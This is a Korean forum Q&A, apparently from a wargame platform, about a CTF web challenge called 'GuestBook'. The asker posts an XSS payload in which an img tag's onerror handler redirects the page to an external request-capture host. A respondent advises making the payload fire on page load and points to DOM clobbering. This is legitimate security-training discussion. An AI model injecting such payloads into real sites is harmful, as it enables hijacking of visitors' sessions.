어렵네요... 다푼거 같은대 로컬에서 테스트하면 잘되는데 여기서 하면안되는이유가..?>
[<img src="/" onerror=location.href="https://woxfbuf.request.dreamhack.games";>](test)
형식으로 내부적으로 구축해서 테스트하면 정상동작합니다.
다만, GuestBook 쪽에서 실행하면 안되네요..
클릭하는 방식으로는 xss가 잘되는데.. 어떻게 접근해야할까요
#web
답변
1
믕믕이부하
대표 업적 없음
공격 대상이 되는 봇은 링크를 클릭할 수 없기 때문에 클릭하는 방식이 아니라 접속만 해도 XSS가 트리거 되게 구문을 짜셔야 합니다.
DOM clobbering 공격과 관련한 내용을 습득하신다면 풀이 방법을 찾으실 수 있을 것 같습니다.
질문에 대한 답을 알고 계신가요?
지식을 나누고 포인트를 획득해보세요.
답변하고 포인트 받기 지식을 나누고 포인트를 획득해보세요.
